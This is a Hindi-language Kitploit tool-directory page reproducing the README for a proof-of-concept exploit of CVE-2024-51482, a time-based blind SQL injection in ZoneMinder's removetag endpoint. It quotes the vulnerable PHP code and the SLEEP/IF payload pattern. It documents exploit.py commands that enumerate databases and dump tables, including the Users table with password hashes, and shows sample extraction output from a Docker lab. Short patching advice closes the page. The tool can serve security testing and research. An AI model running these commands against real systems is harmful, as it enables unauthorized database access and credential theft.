Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-51482-POC — समय-आधारित SQL इंजेक्शन PoC CVE-2024-51482 के लिए ZoneMinder में, प्रतिलिपि योग्य Docker लैब और स्वचालित डेटा निष्कर्षण के साथ। | Kitploit
उपकरण/GitHubGitHub/0xdaeras/cve-2024-51482-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाडेटाबेस सुरक्षालैब और अभ्यास
GitHub0xdaeras/cve-2024-51482-poc

CVE-2024-51482-POC

समय-आधारित SQL इंजेक्शन PoC CVE-2024-51482 के लिए ZoneMinder में, प्रतिलिपि योग्य Docker लैब और स्वचालित डेटा निष्कर्षण के साथ।

रिपॉजिटरी देखें
764 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ZoneMinder प्रमाणित समय-आधारित SQLi POC - CVE-2024-51482

CVE-1 CVSS Python

⚠️ केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान के लिए। इस उपकरण को उन प्रणालियों के विरुद्ध चलाना जिनके आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास लिखित अनुमति नहीं है, अवैध है।


विषय-सूची

  • ZoneMinder प्रमाणित समय-आधारित SQLi POC - CVE-2024-51482
    • विषय-सूची
    • अवलोकन
    • भेद्यता विवरण
      • CVE-2024-51482 — समय-आधारित ब्लाइंड SQL इंजेक्शन
      • मूल कारण
      • हमला प्रवाह
    • रिपॉजिटरी संरचना
    • आवश्यकताएँ
    • स्थापना
      • PoC
      • Docker प्रयोगशाला
    • उपयोग
      • डिफ़ॉल्ट व्यवहार
  • सहायता स्क्रीन
  • कमांड्स
  • आउटपुट विकल्प
  • फ्लैग संदर्भ
  • पूर्ण उदाहरण
  • नोट्स
  • Docker प्रयोगशाला
  • उदाहरण आउटपुट
  • समाधान
    • इस CVE के विरुद्ध
    • समान भेद्यताओं के विरुद्ध
  • प्रकटीकरण समयरेखा
  • संदर्भ

  • अवलोकन

    इस रिपॉजिटरी में ZoneMinder को लक्षित करने वाला एक समय-आधारित SQL इंजेक्शन PoC शामिल है।

    यह उपकरण अनुमति देता है:

    • भेद्यता सत्यापन
    • डेटाबेस गणना
    • तालिका और स्तंभ खोज
    • पूर्ण तालिका डंपिंग
    • CSV निर्यात

    इसमें सुरक्षित परीक्षण के लिए पूरी तरह से प्रतिलिपि प्रस्तुत करने योग्य Docker लैब भी शामिल है।


    भेद्यता विवरण

    CVE-2024-51482 — समय-आधारित ब्लाइंड SQL इंजेक्शन

    • CVE पहचानकर्ता: CVE-2024-51482
    • CVSS v3.1 स्कोर: 10.0 (गंभीर)
    • भेद्यता प्रकार: समय-आधारित ब्लाइंड SQL इंजेक्शन
    • प्रभावित संस्करण: ZoneMinder v1.37.* <= 1.37.64
    • हमला वेक्टर: प्रमाणित एंडपॉइंट (removetag)
    • प्रभाव: पूर्ण डेटाबेस प्रकटीकरण, डेटा अखंडता से समझौता
    • प्रमाणीकरण आवश्यक: हाँ (निम्न-विशेषाधिकार उपयोगकर्ता पर्याप्त है)

    मूल कारण

    ZoneMinder एक मुफ़्त, ओपन सोर्स क्लोज्ड-सर्किट टेलीविज़न सॉफ़्टवेयर एप्लिकेशन है। यह भेद्यता ZoneMinder के removetag एंडपॉइंट में अपर्याप्त इनपुट सत्यापन से उत्पन्न होती है। उपयोगकर्ता द्वारा प्रदान किया गया इनपुट बिना उचित स्वच्छता या पैरामीटरीकरण के सीधे SQL क्वेरी में शामिल किया जाता है, जिससे हमलावर दुर्भावनापूर्ण बूलियन-आधारित SQL पेलोड इंजेक्ट कर सकते हैं। शोषण निम्नलिखित का उपयोग करता है:

    root@kitploit:~
    SLEEP(x - IF(condition, 0, x))
    

    प्रतिक्रिया समय के माध्यम से डेटा का अनुमान लगाने के लिए।

    पूर्ण भेद्य कोड स्निपेट Github Maintainer Advisory से:

    root@kitploit:~
    case 'removetag' :
        $tagId = $_REQUEST['tid'];
        dbQuery('DELETE FROM Events_Tags WHERE TagId = ? AND EventId = ?', array($tagId, $_REQUEST['id']));
        $sql = "SELECT * FROM Events_Tags WHERE TagId = $tagId";
        $rowCount = dbNumRows($sql);
        if ($rowCount < 1) {
          $sql = 'DELETE FROM Tags WHERE Id = ?';
          $values = array($_REQUEST['tid']);
          $response = dbNumRows($sql, $values);
          ajaxResponse(array('response'=>$response));
        }
    

    हमला प्रवाह

    root@kitploit:~
    Attacker                              ZoneMinder Web App
       │                                         │
       │  [Auth]                                 │
       │  POST /zm/index.php                     │
       │  {username, password}                   │
       │────────────────────────────────────────►│
       │◄────────────────────────────────────────│
       │  200 OK + Set-Cookie: ZMSESSID=...      │  ← authenticated session
       │                                         │
       │  [CVE-2024-51482]                       │
       │  GET /zm/index.php                      │
       │  ?view=request&request=event            │
       │  &action=removetag&tid=<payload>        │
       │────────────────────────────────────────►│
       │                               SQL boolean query executed
       │                               IF(condition, no delay, SLEEP)
       │◄────────────────────────────────────────│
       │  Delayed response (timing oracle)       │  ← condition inferred
       │                                         │
       │  Repeat requests                        │
       │  ASCII(SUBSTRING(query,pos,1))          │
       │────────────────────────────────────────►│
       │◄────────────────────────────────────────│
       │  Timing differences reveal characters   │
       │                                         │
       │  Binary search per character            │
       │────────────────────────────────────────►│
       │◄────────────────────────────────────────│
       │  Extracted data (1 char at a time)      │
       │                                         │
       │  SELECT Username, Password FROM Users   │
       │────────────────────────────────────────►│
       │◄────────────────────────────────────────│
       │  Full database disclosure               │
       │                                         │
       ✓  Complete data exfiltration via blind SQLi
    

    रिपॉजिटरी संरचना

    root@kitploit:~
    CVE-2024-51482/
    ├── exploit.py
    ├── README.md
    ├── requirements.txt
    ├── docker-compose.yml
    ├── .env.example
    ├── docker/
    │   ├── Dockerfile
    │   └── entrypoint.sh
    └── logs/
    

    आवश्यकताएँ

    • Python 3.8+
    • requests
    • Docker और docker-compose (प्रयोगशाला वातावरण के लिए)

    स्थापना

    PoC

    root@kitploit:~
    git clone https://github.com/0xDaeras/CVE-2024-51482-POC.git
    cd CVE-2024-51482-POC
    pip install -r requirements.txt
    

    Docker प्रयोगशाला

    root@kitploit:~
    git clone https://github.com/0xDaeras/CVE-2024-51482-POC.git
    cd CVE-2024-51482-POC
    cp .env.example .env  # पर्यावरण चर कॉन्फ़िगर करें
    docker compose up -d
    

    उपयोग

    डिफ़ॉल्ट व्यवहार

    बिना किसी फ्लैग के, उपकरण लक्ष्य को प्रमाणित करेगा, इसकी भेद्यता की जांच करेगा, और यदि भेद्य है, तो zm.Users तालिका (dump-users कमांड) से ID, Username, Password, Name और Email कॉलम डंप करेगा।

    root@kitploit:~
    python exploit.py -t http://target/zm -u <username> -p <password>
    

    सहायता स्क्रीन

    root@kitploit:~
    python exploit.py -h
    

    कमांड्स

    check

    केवल जांचता है कि लक्ष्य भेद्य है या नहीं।

    root@kitploit:~
    python exploit.py -t http://target/zm -u <username> -p <password> check
    

    dump-users

    zm.Users तालिका से ID, Username, Password, Name और Email कॉलम डंप करता है। यदि कोई कमांड निर्दिष्ट नहीं है तो यह डिफ़ॉल्ट कमांड है।

    root@kitploit:~
    python exploit.py -t http://target/zm -u <username> -p <password> dump-users
    

    list-db

    सभी डेटाबेस सूचीबद्ध करता है।

    root@kitploit:~
    python exploit.py -t http://target/zm -u <username> -p <password> list-db
    

    list-tables

    निर्दिष्ट डेटाबेस में तालिकाओं को सूचीबद्ध करता है।

    root@kitploit:~
    python exploit.py -t http://target/zm -u <username> -p <password> list-tables --db <database>
    

    list-columns

    निर्दिष्ट तालिका में स्तंभों को सूचीबद्ध करता है।

    root@kitploit:~
    python exploit.py -t http://target/zm -u <username> -p <password> list-columns --db <database> --table <table>
    

    dump-table

    निर्दिष्ट तालिका से सभी डेटा डंप करता है।

    root@kitploit:~
    python exploit.py -t http://target/zm -u <username> -p <password> dump-table --db <database> --table <table>
    

    आप डंप करने के लिए स्तंभ भी निर्दिष्ट कर सकते हैं (डिफ़ॉल्ट रूप से सभी):

    root@kitploit:~
    python exploit.py -t http://target/zm -u <username> -p <password> dump-table --db <database> --table <table> --columns col1,col2
    

    आउटपुट विकल्प

    टर्मिनल आउटपुट अक्षम करें

    root@kitploit:~
    --no-display
    

    CSV में निर्यात करें

    यदि फ़ाइल मौजूद नहीं है, तो इसे बनाया जाएगा। यदि यह पहले से मौजूद है, तो नए परिणाम जोड़े जाएंगे।

    root@kitploit:~
    --outfile results.csv
    

    फ्लैग संदर्भ

    लक्ष्य और प्रमाणीकरण

    फ्लैगविवरणउदाहरण
    -t, --targetलक्ष्य बेस URL-t http://localhost:8080
    -u, --userप्रमाणीकरण के लिए उपयोगकर्ता नाम-u admin
    -p, --passwordप्रमाणीकरण के लिए पासवर्ड-p admin
    --cookieलॉगिन के बजाय मौजूदा ZMSESSID कुकी का उपयोग करें--cookie abc123...

    मुख्य कमांड्स

    कमांडविवरणउदाहरण
    checkजांचें कि लक्ष्य भेद्य है या नहीं (समय-आधारित SQLi)check
    dump-usersसीधे zm.Users तालिका डंप करेंdump-users
    list-dbसभी डेटाबेस सूचीबद्ध करेंlist-db
    list-tablesडेटाबेस से तालिकाएँ सूचीबद्ध करेंlist-tables --db zm
    list-columnsतालिका से स्तंभ सूचीबद्ध करेंlist-columns --db zm --table Users
    dump-tableएक विशिष्ट तालिका डंप करेंdump-table --db zm --table Users

    कमांड विकल्प

    फ्लैगविवरणआवश्यकताउदाहरण
    --dbडेटाबेस नामहाँ (तालिका/स्तंभ संचालन के लिए)--db zm
    --tableतालिका नामहाँ (स्तंभ/डंप के लिए)--table Users
    --columnsडंप करने के लिए अल्पविराम से अलग किए गए स्तंभवैकल्पिक--columns Username,Password

    प्रदर्शन और शोषण

    फ्लैगविवरणडिफ़ॉल्टउदाहरण
    --threadsसमवर्ती निष्कर्षण थ्रेड की संख्या5--threads 6
    --delayसमय-आधारित SQLi के लिए उपयोग किया गया विलंब3--delay 2
    --no-checkशोषण से पहले भेद्यता जांच छोड़ेंFalse--no-check

    आउटपुट विकल्प

    फ्लैगविवरणउदाहरण
    --outfileआउटपुट को CSV फ़ाइल में सहेजें--outfile results.csv
    --no-displayटर्मिनल आउटपुट अक्षम करें--no-display

    लॉगिंग और प्रदर्शन

    फ्लैगविवरणडिफ़ॉल्टउदाहरण
    -v, --verboseडीबग लॉगिंग सक्षम करेंFalse-v
    --log-fileलॉग फ़ाइल का पथlogs/exploit.log--log-file out.log
    --no-colorरंगीन आउटपुट अक्षम करेंFalse--no-color

    पूर्ण उदाहरण

    root@kitploit:~
    python3 exploit.py \
      -t http://localhost:8080 \
      -u admin -p admin \
      dump-table \
      --db zm \
      --table Users \
      --columns Username,Password \
      --threads 6 \
      --delay 2 \
      --outfile dump.csv
    

    नोट्स

    • सभी कमांड के लिए प्रमाणीकरण आवश्यक है (कुकी या क्रेडेंशियल)।
    • dump-users zm.Users तालिका को डंप करने का एक शॉर्टकट है।
    • मल्टी-थ्रेडिंग निष्कर्षण को काफी तेज करता है लेकिन लक्ष्य पर लोड बढ़ा सकता है। 5 थ्रेड और 3 सेकंड का विलंब सुरक्षित डिफ़ॉल्ट हैं। सावधानी के साथ कस्टम मानों का उपयोग करें।
    • CSV आउटपुट संरचित और फ्लैट दोनों डेटा का समर्थन करता है (जैसे डेटाबेस की सूची बनाम पूर्ण तालिका डंप)।
    • --no-check का उपयोग केवल तभी करें जब आप सुनिश्चित हों कि लक्ष्य भेद्य है।

    Docker प्रयोगशाला

    शामिल docker-compose.yml एक भेद्य ZoneMinder इंस्टेंस सेट करता है।

    root@kitploit:~
    cp .env.example .env  # पर्यावरण चर कॉन्फ़िगर करें
    docker compose up -d
    

    http://localhost:8080/ (या अपने कस्टम पोर्ट) पर वेब इंटरफ़ेस तक पहुँचें। डिफ़ॉल्ट क्रेडेंशियल admin:admin हैं। फिर आप परीक्षण के लिए इस स्थानीय इंस्टेंस के विरुद्ध शोषण चला सकते हैं।


    उदाहरण आउटपुट

    root@kitploit:~
    $ python3 exploit.py -t http://localhost:8080/ -u admin -p admin --outfile ./out.csv dump-table --db zm --table Users --columns Username,Password
                                                                                                                                       
    _________ ____   _______________       ________ _______   ________     _____         .________ ____    _____    ______  ________   
    \_   ___ \\   \ /   /\_   _____/       \_____  \\   _  \  \_____  \   /  |  |        |   ____//_   |  /  |  |  /  __  \ \_____  \  
    /    \  \/ \   Y   /  |    __)_  ______ /  ____//  /_\  \  /  ____/  /   |  |_ ______|____  \  |   | /   |  |_ >      <  /  ____/  
    \     \____ \     /   |        \/_____//       \\  \_/   \/       \ /    ^   //_____//       \ |   |/    ^   //   --   \/       \  
     \______  /  \___/   /_______  /       \_______ \\_____  /\_______ \\____   |       /______  / |___|\____   | \______  /\_______ \ 
            \/                   \/                \/      \/         \/     |__|              \/            |__|        \/         \/ 
                                                                                                                                       
    
    [∗] Target URL: http://localhost:8080/
    [∗] Module : dump-table
    [∗] Output will be saved to: ./out.csv
    
    [∗] Attempting to log in with username/password authentication
     🡲  Credentials: admin:admin
    [+] Successfully authenticated as user admin
    
    [∗] Testing target vulnerability...
    [+] Target appears to be vulnerable (response time indicates successful injection).
    
    [∗] Dumping contents of table zm.Users...
    [+] Found columns: Username, Password
    [∗] Retrieving number of rows in the table...
    [+] Table contains 2 rows. Starting dump...
    
    [∗] Progress: 5/5 | admin
    [∗] Progress: 60/60 | $2h$12$NHZs...
    [+] Retrieved row 1 : admin, $2h$12$NHZs...
    
    [∗] Progress: 4/4 | flag
    [∗] Progress: 60/60 | $2y$10$1Ei....
    [+] Retrieved row 2 : flag, $2y$10$1Ei....
    
    +----------+----------------+
    | Username | Password       |
    +----------+----------------+
    | admin    | $2h$12$NHZs... |
    | flag     | $2y$10$1Ei.... |
    +----------+----------------+
    
    [+] Results written to ./out.csv
    [+] Work done. Bye!
    

    समाधान

    इस CVE के विरुद्ध

    • ZoneMinder v1.37.65 या बाद के संस्करण में अपडेट करें, जिसमें CVE-2024-51482 के लिए फिक्स शामिल है।

    समान भेद्यताओं के विरुद्ध

    • सभी उपयोगकर्ता-आपूर्ति किए गए डेटा पर उचित इनपुट सत्यापन और स्वच्छता लागू करें।
    • SQL इंजेक्शन को रोकने के लिए पैरामीटराइज़्ड क्वेरी या तैयार कथनों का उपयोग करें।

    प्रकटीकरण समयरेखा

    • 2024-10-31: उपयोगकर्ता Entropt और उपयोगकर्ता connortechnology ने ZoneMinder GitHub पर भेद्यता का खुलासा किया।
    • 2024-11-01: ZoneMinder रिपॉजिटरी में पैच प्रतिबद्ध किया गया।
    • 2025-02-13: संस्करण 1.37.65 टैग किया गया।

    संदर्भ

    • CVE-2024-51482 विवरण
    • NIST NVD प्रविष्टि
    • ZoneMinder आधिकारिक वेबसाइट
    • ZoneMinder GitHub रखरखावकर्ता सुरक्षा सलाह
    • ZoneMinder GitHub में फिक्स कमिट
    • OWASP SQL इंजेक्शन रोकथाम चीट शीट
    टूल डाउनलोड करें